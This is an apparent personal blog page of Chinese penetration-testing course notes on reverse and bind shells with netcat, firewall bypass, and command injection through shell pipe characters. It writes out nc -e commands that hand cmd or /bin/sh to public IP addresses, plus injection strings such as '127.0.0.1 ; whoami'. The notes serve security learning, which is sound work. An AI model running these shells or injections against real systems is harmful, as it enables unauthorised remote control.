<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>小迪安全2023day5 | 十二亿七千光年的笔记本</title>
  <meta name="keywords" content="">
  <meta name="description" content="小迪安全2023day5 | 十二亿七千光年的笔记本">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="title: 小迪安全2023day12 date: 2024-11-06  信息打点-Web 应用&amp;企业产权&amp;指纹识别&amp;域名资产&amp;网络空间&amp;威胁情报1.信息搜集12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535">
<meta property="og:type" content="article">
<meta property="og:title" content="十二亿七千光年的笔记本">
<meta property="og:url" content="http://example.com/2024/11/09/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day12/index.html">
<meta property="og:site_name" content="十二亿七千光年的笔记本">
<meta property="og:description" content="title: 小迪安全2023day12 date: 2024-11-06  信息打点-Web 应用&amp;企业产权&amp;指纹识别&amp;域名资产&amp;网络空间&amp;威胁情报1.信息搜集12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-11-09T10:30:33.641Z">
<meta property="article:modified_time" content="2024-11-14T11:49:07.413Z">
<meta property="article:author" content="十二亿七千光年">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/favicon.ico">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/favicon.ico"/>
</a>
<div class="author">
    <span>十二亿七千光年</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(24)</small>
            
        </div>
    </li>
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
        <a 
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="24">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="search shortcut key i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="switch to outline view shortcut key w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="return"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="case sensitive"></i>
            <i class="iconfont icon-tag" data-title="label"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">outline</div>
            <i class="iconfont icon-list" data-title="switch to article list"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="All "
           href="/2024/11/09/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day12/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2024-11-09 18:30:33">2024/11/09</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/python/Python%E5%9F%BA%E7%A1%80%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Python基础思维导图">Python基础思维导图</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/Linux/Linux%E5%9F%BA%E7%A1%80%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Linux基础思维导图">Linux基础思维导图</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E6%95%B0%E6%8D%AE%E5%BA%93/mysql/mysql%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="mysql思维导图">mysql思维导图</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day1/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day1">小迪安全2023day1</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day10/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day10">小迪安全2023day10</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day11/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day11">小迪安全2023day11</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day2/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day2">小迪安全2023day2</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day4/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day4">小迪安全2023day4</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day3/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day3">小迪安全2023day3</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day5/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day5">小迪安全2023day5</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day6/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day6">小迪安全2023day6</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day7/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day7">小迪安全2023day7</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day8">小迪安全2023day8</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day9/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day9">小迪安全2023day9</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day13/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day13">小迪安全2023day13</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day14/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day14">小迪安全2023day14</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day16/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day16">小迪安全2023day16</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day15/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day15">小迪安全2023day15</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day17/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day17">小迪安全2023day17</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day18/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day18">小迪安全2023day18</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day19/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day19">小迪安全2023day19</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day20/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day20">小迪安全2023day20</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        
        <a  class="All "
           href="/2024/11/06/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8/%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A82023day21/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="小迪安全2023day21">小迪安全2023day21</span>
            <span class="post-date" title="2024-11-06 00:00:00">2024/11/06</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="Toggle full screen shortcut key s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-网络安全/小迪安全/基础入门/小迪安全2023day5" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">小迪安全2023day5</h1>
    
    <div class="article-meta">
        
        
        
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2024-11-14 19:50:33'>2024-11-06 00:00</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E5%85%A5%E9%97%A8-%E5%8F%8D%E5%BC%B9-SHELL-%E4%B8%8D%E5%9B%9E%E6%98%BE%E5%B8%A6%E5%A4%96-%E6%AD%A3%E5%8F%8D%E5%90%91%E8%BF%9E%E6%8E%A5-%E9%98%B2%E7%81%AB%E5%A2%99%E5%87%BA%E5%85%A5%E7%AB%99-%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD"><span class="toc-text">基础入门-反弹 SHELL&amp;不回显带外&amp;正反向连接&amp;防火墙出入站&amp;文件下载</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E6%B8%97%E9%80%8F%E5%91%BD%E4%BB%A4-%E5%B8%B8%E8%A7%84%E5%91%BD%E4%BB%A4-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E4%B8%8B%E8%BD%BD"><span class="toc-text">1、渗透命令-常规命令&amp;文件上传下载</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%EF%BC%881%EF%BC%89%E5%B8%B8%E8%A7%84%E5%9F%BA%E6%9C%AC%E6%B8%97%E9%80%8F%E5%91%BD%E4%BB%A4%E8%AF%A6%E8%A7%A3"><span class="toc-text">（1）常规基本渗透命令详解</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%EF%BC%882%EF%BC%89%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E4%B8%8B%E8%BD%BD"><span class="toc-text">（2）文件上传下载</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%8F%8D%E5%BC%B9-Shell-%E5%91%BD%E4%BB%A4-%E8%A7%A3%E5%86%B3%E6%95%B0%E6%8D%AE%E5%9B%9E%E6%98%BE-%E8%A7%A3%E5%86%B3%E6%95%B0%E6%8D%AE%E9%80%9A%E8%AE%AF"><span class="toc-text">2.反弹 Shell 命令-解决数据回显&amp;解决数据通讯</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%EF%BC%881%EF%BC%89%E6%AD%A3%E5%90%91%E8%BF%9E%E6%8E%A5%EF%BC%9A%E6%88%91%E8%BF%9E%E6%8E%A5%E4%BD%A0"><span class="toc-text">（1）正向连接：我连接你</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%EF%BC%882%EF%BC%89%E5%8F%8D%E5%90%91%E8%BF%9E%E6%8E%A5%EF%BC%9A%E6%88%91%E7%AD%89%E7%9D%80%E4%BD%A0%E8%BF%9E%E6%8E%A5"><span class="toc-text">（2）反向连接：我等着你连接</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E5%AE%9E%E9%99%85%E6%A1%88%E4%BE%8B1%EF%BC%9A%E9%98%B2%E7%81%AB%E5%A2%99%E7%BB%95%E8%BF%87-%E6%AD%A3%E5%90%91%E8%BF%9E%E6%8E%A5-%E5%8F%8D%E5%90%91%E8%BF%9E%E6%8E%A5-%E5%86%85%E7%BD%91%E6%9C%8D%E5%8A%A1%E5%99%A8"><span class="toc-text">3.实际案例1：防火墙绕过-正向连接&amp;反向连接&amp;内网服务器</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E5%AE%9E%E9%99%85%E6%A1%88%E4%BE%8B-2%EF%BC%9A%E9%98%B2%E7%81%AB%E5%A2%99%E7%BB%84%E5%90%88%E6%95%B0%E6%8D%AE%E4%B8%8D%E5%9B%9E%E6%98%BE-ICMP-%E5%B8%A6%E5%A4%96%E6%9F%A5%E8%AF%A2-Dnslog"><span class="toc-text">4. 实际案例 2：防火墙组合数据不回显-ICMP 带外查询 Dnslog</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="基础入门-反弹-SHELL-不回显带外-正反向连接-防火墙出入站-文件下载"><a href="#基础入门-反弹-SHELL-不回显带外-正反向连接-防火墙出入站-文件下载" class="headerlink" title="基础入门-反弹 SHELL&amp;不回显带外&amp;正反向连接&amp;防火墙出入站&amp;文件下载"></a>基础入门-反弹 SHELL&amp;不回显带外&amp;正反向连接&amp;防火墙出入站&amp;文件下载</h1><h2 id="1、渗透命令-常规命令-文件上传下载"><a href="#1、渗透命令-常规命令-文件上传下载" class="headerlink" title="1、渗透命令-常规命令&amp;文件上传下载"></a>1、渗透命令-常规命令&amp;文件上传下载</h2><h2 id="（1）常规基本渗透命令详解"><a href="#（1）常规基本渗透命令详解" class="headerlink" title="（1）常规基本渗透命令详解"></a>（1）常规基本渗透命令详解</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43303273/article/details/83029138">https://blog.csdn.net/weixin_43303273/article/details/83029138</a></p>
<h2 id="（2）文件上传下载"><a href="#（2）文件上传下载" class="headerlink" title="（2）文件上传下载"></a>（2）文件上传下载</h2><ul>
<li><p>文件上传下载-解决无图形化&amp;解决数据传输</p>
</li>
<li><p>使用环境：实际使用中，浏览器访问web的文件目录自动进行下载的文件，但系统内没有图形化界面时，使用命令向自己的服务器请求下载文件</p>
</li>
<li><p>命令生成：使用棱角社区的生成下载命令的在线工具</p>
<p><a target="_blank" rel="noopener" href="https://forum.ywhack.com/bountytips.php?download">https://forum.ywhack.com/bountytips.php?download</a></p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410242013716.png"></p>
<p>填写自己的服务器ip和端口，对不同的操作系统选择不同的命令</p>
</li>
</ul>
<h2 id="2-反弹-Shell-命令-解决数据回显-解决数据通讯"><a href="#2-反弹-Shell-命令-解决数据回显-解决数据通讯" class="headerlink" title="2.反弹 Shell 命令-解决数据回显&amp;解决数据通讯"></a>2.反弹 Shell 命令-解决数据回显&amp;解决数据通讯</h2><ul>
<li><p>windows：下载nc工具</p>
<p>linux：使用自带的nc(ncat)</p>
</li>
<li><p>命令生成：棱角社区反弹shell一键生成</p>
<p><a target="_blank" rel="noopener" href="https://forum.ywhack.com/shell.php">https://forum.ywhack.com/shell.php</a></p>
</li>
</ul>
<h2 id="（1）正向连接：我连接你"><a href="#（1）正向连接：我连接你" class="headerlink" title="（1）正向连接：我连接你"></a>（1）正向连接：我连接你</h2><ul>
<li><p>本地监听等待对方连接，端口选择1-65535（只要不被占用）</p>
<ul>
<li><p>Linux 控制 Windows </p>
<p>windows绑定 CMD 到本地 5566 端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e cmd -lvp 5566</span><br></pre></td></tr></table></figure>

<p>linux主动连接目标windows（47.122.23.131）5566 ，进入到windows的cmd</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 47.122.23.131 5566</span><br></pre></td></tr></table></figure>

<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410242312762.png"></p>
</li>
<li><p>Windows 控制 Linux </p>
<p>linux绑定 &#x2F;bin&#x2F;sh 到本地 5566 端口 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e /bin/sh -lvp 5566</span><br></pre></td></tr></table></figure>

<p>windows主动连接目标linux（47.94.236.117），进入到linux的&#x2F;bin&#x2F;sh</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 47.94.236.117 5566</span><br></pre></td></tr></table></figure>

<p><img src="C:\Users\14232\AppData\Roaming\Typora\typora-user-images\image-20241024232921410.png" alt="image-20241024232921410"></p>
</li>
</ul>
</li>
</ul>
<h2 id="（2）反向连接：我等着你连接"><a href="#（2）反向连接：我等着你连接" class="headerlink" title="（2）反向连接：我等着你连接"></a>（2）反向连接：我等着你连接</h2><ul>
<li><p>主动给出去，对方监听</p>
</li>
<li><p>windows控制linux</p>
<p>linux绑定&#x2F;bin&#x2F;sh主动给到目标 windows（47.122.23.131）5566 端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e /bin/sh 47.122.23.131 5566</span><br></pre></td></tr></table></figure>

<p>windows5566 连接，进入到linux的&#x2F;bin&#x2F;sh</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 5566</span><br></pre></td></tr></table></figure>
</li>
<li><p>linux控制windows</p>
<p>windows绑定CMD主动给到目标linux（47.94.236.117） 5566 端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e cmd 47.94.236.117 5566</span><br></pre></td></tr></table></figure>

<p>linux 5566 连接，进入windows的cmd</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvvp 5566</span><br></pre></td></tr></table></figure>

<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410242357428.png"></p>
</li>
</ul>
<hr>
<ul>
<li><p>Linux外网服务器连接内网windows</p>
<p><img src="https://learning-image-hwt.oss-cn-heyuan.aliyuncs.com/image1/202410251036293.png"></p>
<p>linux找不到windows的ip，windows可以访问外网linux，只能windows主动给出去</p>
<p>内网windows，内网ip（192.168.1.99），出网ip（171.0.1.2）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e cmd 47.94.236.117 5566</span><br></pre></td></tr></table></figure>

<p>外网linux</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lvp 5566</span><br></pre></td></tr></table></figure>


</li>
<li><p>内网windows连接外网linux服务器</p>
<p>外网linux：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -e /bin/sh -lvp 5566</span><br></pre></td></tr></table></figure>

<p>内网windows：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 47.94.236.117 5566</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="3-实际案例1：防火墙绕过-正向连接-反向连接-内网服务器"><a href="#3-实际案例1：防火墙绕过-正向连接-反向连接-内网服务器" class="headerlink" title="3.实际案例1：防火墙绕过-正向连接&amp;反向连接&amp;内网服务器"></a>3.实际案例1：防火墙绕过-正向连接&amp;反向连接&amp;内网服务器</h2><ul>
<li><p>管道符：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">| (管道符号) || (逻辑或) &amp;&amp; (逻辑与) &amp; (后台任务符号)</span><br></pre></td></tr></table></figure>

<p>windows：| &amp; || &amp;&amp;</p>
<p>linux: ; | || &amp; &amp;&amp; `&#96; (特有 ; 和 `&#96;)</p>
</li>
<li><p>使用管道符实现执行多个命令</p>
<p>例子：</p>
<ul>
<li><pre><code>ping -c 1 127.0.0.1 ; whoami
ping ;whoami
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- ```</span><br><span class="line">  ping -c 1 127.0.0.1 | whoami</span><br></pre></td></tr></table></figure>
</code></pre>
</li>
<li><pre><code>ping -c 1 127.0.0.1 || whoami
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- ```</span><br><span class="line">  ping -c 1 127.0.0.1 &amp; whoami</span><br></pre></td></tr></table></figure>
</code></pre>
</li>
<li><pre><code>ping -c 1 127.0.0.1 &amp;&amp; whoami
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- ```</span><br><span class="line">  ping -c 1 127.0.0.1 `whoami` </span><br><span class="line">  ping `whoami`</span><br></pre></td></tr></table></figure>
</code></pre>
